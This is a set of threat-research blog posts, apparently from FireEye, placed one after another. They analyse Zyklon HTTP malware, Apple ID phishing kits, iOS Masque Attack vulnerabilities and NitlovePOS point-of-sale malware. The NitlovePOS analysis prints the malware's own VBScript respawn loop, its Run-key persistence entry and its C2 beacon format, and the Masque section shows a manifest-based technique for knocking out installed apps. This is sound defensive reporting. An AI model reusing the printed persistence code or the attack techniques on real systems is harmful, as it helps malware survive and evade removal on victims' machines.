The downloaded file, doc.doc, is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary Pause.ps1.

Figure 6: PowerShell command to download the Pause.ps1 payload

Dynamic Data Exchange (DDE)

Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (Pause.ps1) is downloaded.

Figure 7: DDE technique used to download the Pause.ps1 payload

One of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).

Figure 8 shows the network communication of the Pause.ps1 download.

Figure 8: Network communication to download the Pause.ps1 payload

Zyklon Delivery

In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).

The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.

Figure 9: Base64 decoded Pause.ps1

The injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.

Figure 10: Network traffic to download final payload (words.exe)

Once executed, the file performs the following activities:

  1. Drops a copy of itself in %AppData%\svchost.exe\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).
  2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.
  3. The unpacked code is Zyklon.

Figure 11: XML configuration file to schedule the task

The Zyklon malware first retrieves the external IP address of the infected machine using the following:

  • api.ipify[.]org
  • ip.anysrc[.]net
  • myexternalip[.]com
  • whatsmyip[.]com

The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer.

Command & Control Communication

The C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).

Figure 12: Zyklon public RSA key

After the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.




Requests system information


Requests settings from C2 server


Uploads harvested passwords


Uploads harvested cryptocurrency wallet data


Indicates SOCKS proxy port opened


Cryptocurrency miner commands


Reports errors to C2 server


DDoS attack commands

Table 1: Zyklon accepted commands

The following figures show the initial request and subsequent server response for the “settings” (Figure 13), “sign” (Figure 14), and “ddos” (Figure 15) commands.

Figure 13: Zyklon issuing “settings” command and subsequent server response

Figure 14: Zyklon issuing “sign” command and subsequent server response

Figure 15: Zyklon issuing “ddos” command and subsequent server response

Plugin Manager

Zyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:

  • /plugin/index.php?plugin=<Plugin_Name>

The following plugins are found in the memory of the Zyklon malware:

  • /plugin/index.php?plugin=cuda
  • /plugin/index.php?plugin=minerd
  • /plugin/index.php?plugin=sgminer
  • /plugin/index.php?plugin=socks
  • /plugin/index.php?plugin=tor
  • /plugin/index.php?plugin=games
  • /plugin/index.php?plugin=software
  • /plugin/index.php?plugin=ftp
  • /plugin/index.php?plugin=email
  • /plugin/index.php?plugin=browser

The downloaded plugins are injected into: Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe.

Additional Features

The Zyklon malware offers the following additional capabilities (via plugins):

Browser Password Recovery

Zyklon HTTP can recover passwords from popular web browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera Browser
  • Chrome Canary/SXS
  • CoolNovo Browser
  • Apple Safari
  • Flock Browser
  • SeaMonkey Browser
  • SRWare Iron Browser
  • Comodo Dragon Browser
FTP Password Recovery

Zyklon currently supports FTP password recovery from the following FTP applications:

  • FileZilla
  • SmartFTP
  • FlashFXP
  • FTPCommander
  • Dreamweaver
  • WS_FTP
Gaming Software Key Recovery

Zyklon can recover PC Gaming software keys from the following games:

  • Battlefield
  • Call of Duty
  • FIFA
  • NFS
  • Age of Empires
  • Quake
  • The Sims
  • Half-Life
  • IGI
  • Star Wars
Email Password Recovery

Zyklon may also collect email passwords from following applications:

  • Microsoft Outlook Express
  • Microsoft Outlook 2002/XP/2003/2007/2010/2013
  • Mozilla Thunderbird
  • Windows Live Mail 2012
  • IncrediMail, Foxmail v6.x - v7.x
  • Windows Live Messenger
  • MSN Messenger
  • Google Talk
  • GMail Notifier
  • PaltalkScene IM
  • Pidgin (Formerly Gaim) Messenger
  • Miranda Messenger
  • Windows Credential Manager
License Key Recovery

The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero.

Socks5 Proxy

Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines.

Hijack Clipboard Bitcoin Address

Zyklon has the ability to hijack the clipboard, and replaces the user’s copied bitcoin address with an address served up by the actor’s control server.

Zyklon Pricing

Researchers identified different versions of Zyklon HTTP being advertised in a popular underground marketplace for the following prices:

  • Normal build: $75 (USD)
  • Tor-enabled build: $125 (USD)
  • Rebuild/Updates: $15 (USD)
  • Payment Method: Bitcoin (BTC)


Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.

At this time of writing, FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. Table 2 lists the current detection and blocking capabilities by product.

Detection Name

































Table 2: Current detection capabilities by FireEye products

Indicators of Compromise

The contained analysis is based on the representative sample lures shown in Table 3.













Table 3: Sample Zyklon lures

Network Indicators

Rotten Apples: Apple-like Malicious Phishing Domains

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information –  including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows user to store passwords and credit card information and have it entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains appeared as an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly sophisticated, obfuscated and suspicious JavaScripts, which was creating the phishing HTML content on the web page. This technique is effective against anti-phishing systems that rely on the HTML content and analyze the forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, AppleidApplecwy[.]com, Appleid-xyw[.]com, Appleid-yun-iCloud[.]com, iCloud-Apple-apleid[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com , icluod-web-ios[.]com and ios-web-Apple[.]com

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique as a simple GET request to any of these domains results in an encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

This encoded string strHTML goes through a complex sequence of around 23 decrypting/decoding functions that include number system conversions, pseudo-random pattern modifiers followed by XOR decoding using a fixed key or password “zycode” for the actual HTML phishing content to be finally created (refer to Figure 15 and Figure 16 in Appendix 1 for complete code). Phishing detection systems that rely solely on the HTML in the response section will completely fail to detect the code generated using this technique.

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

Burp Suite is a tool to secure and penetrate web applications: https://portswigger[.]net/burp/.  The Burp session of a user supplying login and password to the HTML form is shown in Figure 3. Here we can see 5 variables (u,p,x,y and cc) and a cookie being sent via HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next the user was presented with an ask3.asp webpage shown in Figure 5.


Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail using Burp suite tool is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tried to supply the same Apple ID twice, they got redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirected the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

We found that the registrant names for all of these phony Apple domains were these Chinese names: “Yu Hu” and “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all these domains were registered with qq[.].com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that the system had been seeing similar domains at an increasing frequency. Analyzing the registration information, we found some interesting patterns. Since January 2016 to the time of writing, the system marked around 240 unique domains that have something to do with Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique email registrants with 64 unique emails pointing to qq[.]com, 36 unique Gmail email accounts, and 18 unique email addresses each belonging to 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in following different ways:

  • The domain list provided here could be used by Apple customers as a blacklist; they can avoid browsing to such domains and providing credentials to any of the listed domains, whether they receive them via SMS, email or via any instant messaging service.
  • The Apple credential phishing detection teams could use this information, as it highlights that all domains registered with these email addresses, registrant names and addresses, as well as their combinations, are potentially malicious and serving phishing content. This information could be used to block all future domains registered by the same entities.
  • Patterns emerging from this data reveal that for such campaigns, attackers prefer to use email addresses from Chinese services such as, and It has also been observed that instead of names, the attackers have used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.


Figure 9: Geo-location plot of the IPs for this campaign
Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)...

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)||:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’


100%[============================================================================================================>] 203         --.-K/s   in 0s      


2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />


This code redirects the browser to this URL/page:


This loads a highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code being shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form gets submitted to signin-box-disabled.php and the JavaScript and jQuery creates the page seen in Figure 11, informing the user that the Apple ID provided has been locked and the user must unlock it:

Figure 11: Phishing page suggesting victims to unlock their Apple IDs

, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country part of the address drop-down menu only allowed address options from England, Scotland and Wales, suggesting that this attack is targeting these regions onlyClicking on unlock leads the user to the page profile.php .

Figure 12: User information requested by phishing page

On submitting false information on this form, the user would get a page asking to wait while the entered information is confirmed or verified. After a couple of seconds of processing, the page congratulates the user that their Apple ID was successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real apple login page

Domain Registration Information

It was observed that all of these domains used the whois privacy protection feature offered by many registrars. This feature enables the registrants to hide their personal and contact information which otherwise is available via the whois service. These domains were registered with the email “contact@privacyprotect[.]org


All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.


Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operas

Figure 16: Obfuscated JS served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operaters. While in Red we have: XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

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Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to versions 8.1.3 or above, even 5 months after the release of 8.1.3, and these devices are still vulnerable to all the Masque Attacks.

We have disclosed five kinds of Masque Attacks, as shown in the following table.


Consequences disclosed till now

Mitigation status

App Masque

* Replace an existing app

* Harvest sensitive data

Fixed in iOS 8.1.3 [6]

URL Masque

* Bypass prompt of trust

* Hijack inter-app communication

Partially fixed in iOS 8.1.3 [11]

Manifest Masque

* Demolish other apps (incl. Apple Watch, Health, Pay, etc.) during over-the-air installations

Partially fixed in iOS 8.4

Plugin Masque

* Bypass prompt of trust

* Bypass VPN plugin entitlement

* Replace an existing VPN plugin

* Hijack device traffic

* Prevent device from rebooting

* Exploit more kernel vulnerabilities

Fixed in iOS 8.1.3

Extension Masque

* Access another app’s data

* Or prevent another app to access its own data

Partially fixed in iOS 8.4

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including a similar issue with this one [5]. They did remarkable research, but happened to miss this on iOS. Their report claimed: “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched on iOS 8.4, we also disclose the detail of another untrusted code injection attack by replacing the VPN Plugin, the Plugin Masque Attack. We reported this vulnerability to Apple in Nov 2014, and Apple fixed the vulnerability on iOS 8.1.3 when Apple patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected to the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack in the Jailbreak Security Summit [7] in April 2015. Here we categorize this attack as Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to a XML manifest file hosted on an https server [1]. The XML manifest file contains metadata of the in-house app, including its bundle identifier, bundle version and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parse the metadata for the installation process.

<a href="itms-services://?action=downloadmanifest&url= plist">Install App</a>
















              … Entries For Another App




Table 1. An example of the hyperlink and the manifest file

According to Apple’s official document [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify the consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain different apps’ metadata entries to distribute multiple apps at a time, which means this vulnerability can cause multiple apps being demolished with just one click by the victim.

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install “malicious Chrome” registering the same scheme. Other than requiring the same bundle identifier to replace a genuine app in the original Masque Attack [xx], the malicious chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.

NitlovePOS: Another New POS Malware

There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale (POS) systems over the last two years. In 2015, there have already been a variety of new POS malware identified including a new Alina variant, FighterPOS and Punkey. During our research into a widespread spam campaign, we discovered yet another POS malware that we’ve named NitlovePOS.

The NitlovePOS malware can capture and ex-filtrate track one and track two payment card data by scanning the running processes of a compromised machine. It then sends this data to a webserver using SSL.

We believe the cybercriminals assess the hosts compromised via indiscriminate spam campaigns and instruct specific victims to download the POS malware.


We have been monitoring an indiscriminate spam campaign that started on Wednesday, May 20, 2015.  The spam emails referred to possible employment opportunities and purported to have a resume attached. The “From” email addresses were spoofed Yahoo! Mail accounts and contained the following “Subject” lines:

    Subject: Any Jobs?

    Subject: Any openings?

    Subject: Internship

    Subject: Internship questions

    Subject: Internships?

    Subject: Job Posting

    Subject: Job questions

    Subject: My Resume

    Subject: Openings?

The email came with an attachment named CV_[4 numbers].doc or My_Resume_[4 numbers].doc, which is embedded with a malicious macro. To trick the recipient into enabling the malicious macro, the document claims to be a “protected document.”

If enabled, the malicious macro will download and execute a malicious executable from The cybercriminals behind this operation have been updating the payload. So far, we have observed:

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

These payloads beacon to the same server from which they are downloaded and receive instructions to download additional malware hosted on this server. This server contains a wide variety of malware:

    6545d2528460884b24bf6d53b721bf9e  5dro.exe

    e339fce54e2ff6e9bd3a5c9fe6a214ea  AndroSpread.exe

    9e208e9d516f27fd95e8d165bd7911e8  AndroSpread.exe

    abc69e0d444536e41016754cfee3ff90  dr2o.exe

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

    c8b0769eb21bb103b8fbda8ddaea2806  jews2.exe

    4d877072fd81b5b18c2c585f5a58a56e  load33.exe

    9c6398de0101e6b3811cf35de6fc7b79  load.exe

    ac8358ce51bbc7f7515e656316e23f8d  Pony.exe

    3309274e139157762b5708998d00cee0  Pony.exe

    b3962f61a4819593233aa5893421c4d1  pos.exe

    6cdd93dcb1c54a4e2b036d2e13b51216  pos.exe

We focused on the “pos.exe” malware and suspected that it maybe targeted Point of Sale machines. We speculate that once the attackers have identified a potentially interesting host form among their victims, they can then instruct the victim to download the POS malware. While we have observed many downloads of the various EXE’s hosed on that server, we have only observed three downloads of “pos.exe”.

Technical Analysis

We analyzed the “pos.exe” (6cdd93dcb1c54a4e2b036d2e13b51216) binary found on the server. (A new version of “pos.exe” (b3962f61a4819593233aa5893421c4d1) was uploaded on May 22, 2015 that has exactly the same malicious behavior but with different file structure.)

The binary itself is named “TAPIBrowser” and was created on May 20, 2015.

    File Name                       : pos.exe

    File Size                       : 141 kB

    MD5: 6cdd93dcb1c54a4e2b036d2e13b51216

    File Type                       : Win32 EXE

    Machine Type                    : Intel 386 or later, and compatibles

    Time Stamp                      : 2015:05:20 09:02:54-07:00

    PE Type                         : PE32

    File Description                : TAPIBrowser MFC Application

    File Version                    : 1, 0, 0, 1

    Internal Name                   : TAPIBrowser

    Legal Copyright                 : Copyright (C) 2000

    Legal Trademarks                :

    Original Filename               : TAPIBrowser.EXE

    Private Build                   :

    Product Name                    : TAPIBrowser Application

    Product Version                 : 1, 0, 0, 1:

The structure of the file is awkward; it only contains three sections: .rdata, .hidata and .rsrc and the entry point located inside .hidata:

When executed, it will copy itself to disk using a well-known hiding technique via NTFS Alternate Data Streams (ADS) as:

    ~\Local Settings\Temp:defrag.scr

Then will create a vbs script and save it to disk, again using ADS:

    ~\Local Settings\Temp:defrag.vbs

By doing this, the files are not visible in the file system and therefore are more difficult to locate and detect.

Once the malware is running, the “defrag.vbs” script monitors for attempts to delete the malicious process via InstanceDeletion Event; it will re-spawn the malware if the process is terminated. Here is the code contained within “defrag.vbs”:

Set f=CreateObject("Scripting.FileSystemObject")

Set W=CreateObject("WScript.Shell")

Do While                      

GetObject("winmgmts:Win32_Process").Create(W.ExpandEnvironmentStrings("""%TMP%:Defrag.scr""     -"),n,n,p)=0

GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery("Select * From __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process' AND TargetInstance.ProcessID="&p).NextEvent


W.Run(W.ExpandEnvironmentStrings("cmd /C /D type nul > %TMP%:Defrag.scr")), 0, true

Exit Do

End If


The malware ensures that it will run after every reboot by adding itself to the Run registry key:

    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\"Defrag" = wscript "C:\Users\ADMINI~1\AppData\Local\Temp:defrag.vbs"

NitlovePOS expects to be run with the “-“ sign as argument; otherwise it won’t perform any malicious actions. This technique can help bypass some methods of detection, particularly those that leverage automation. Here is an example of how the malware is executed:

    \LOCALS~1\Temp:Defrag.scr" -

If the right argument is provided, NitlovePOS will decode itself in memory and start searching for payment card data. If it is not successful, NitlovePOS will sleep for five minutes and restart the searching effort.

NitlovePOS has three main threads:

    Thread 1:  SSL C2 Communications

    Thread 2: MailSlot monitoring waiting for CC.

    Thread 3: Memory Scrapping

Thread 1:  C2 Communications

NitlovePOS is configured to connect to one of three hardcoded C2 servers:




All three of these domains resolve to the same IP address: This IP address is assigned to a network located in St. Petersburg, Russia.

As soon as NitlovePOS starts running on the compromised system, it will initiate a callback via SSL:

    POST /derpos/gateway.php HTTP/1.1

    User-Agent: nit_love<GUID>


    Content-Length: 41

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache



    <computer name>

    <OS Version>


The User-Agent header contains a hardcoded string “nit_love” and the Machine GUID, which is not necessarily unique but can be used as an identifier by the cybercriminals. The string “HWAWAWAWA” is hardcoded and may be a unique campaign identifier; the “F.r.” is calculated per infected host.

Thread 2: MailSlot monitoring waiting for payment card data

A mailslot is basically a shared range of memory that can be used to store data; the process creating the mailslot acts as the server and the clients can be other hosts on the same network, local processes on the machine, or local threads in the same process.

NitlovePOS uses this feature to store payment card information; the mailslot name that is created comes as a hardcoded string in the binary (once de-obfuscated);


Once the mailslot is created, an infinite loop will keep querying the allocated space.

Thread 3: Memory Scrapping

NitlovePOS scans running processes for payment data and but will skip System and “System Idle Process.” It will try to match track 1 or track 2 data and, if found, will write the data into the mailslot created by Thread 2. This information is then sent via POST it to the C2 using SSL, which makes network-level detection more difficult.

Possible Control Panel

During our research we observed what appears to be a test control panel on a different, but probably related, server that matches with NitlovePOS. This panel is called “nitbot,” which is similar to the “nit_love” string found in the binary and was located in a directory called “derpmo” which is similar to the “derpos” used in this case.


The information contained in the NitlovePOS beacon matches the fields that are displayed in the Nitbot control panel. These include the machines GIUD that is transmitted in the User-Agent header as well as an identifier “HWAWAWAWA,” which aligns with the “group name” that can be used by the cybercriminals to track various campaigns.

The control panel contains a view that lists the “tracks,” or stolen payment card data. This indicates that this panel is for malware capable of stealing data from POS machines that matches up with the capability of the NitlovePOS malware.


Even cybercriminals engaged in indiscriminate spam operations have POS malware available and can deploy it to s subset of their victims. Due to the widespread use of POS malware, they are eventually discovered and detection increases. However, this is followed by the development of new POS with very similar functionality. Despite the similarity, the detection levels for new variants are initially quite low. This gives the cybercriminals a window of opportunity to exploit the use of a new variant.

We expect that new versions of functionally similar POS malware will continue to emerge to meet the demand of the cybercrime marketplace.

Two Limited, Targeted Attacks; Two New Zero-Days

The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel, with Microsoft assigning CVE-2014-4148 and CVE-2014-4113 to and addressing the vulnerabilities in their October 2014 Security Bulletin.

FireEye Labs have identified 16 total zero-day attacks in the last two years – uncovering 11 in 2013 and five in 2014 so far.

Microsoft commented: “On October 14, 2014, Microsoft released MS14-058 to fully address these vulnerabilities and help protect customers. We appreciate FireEye Labs using Coordinated Vulnerability Disclosure to assist us in working toward a fix in a collaborative manner that helps keep customers safe.”

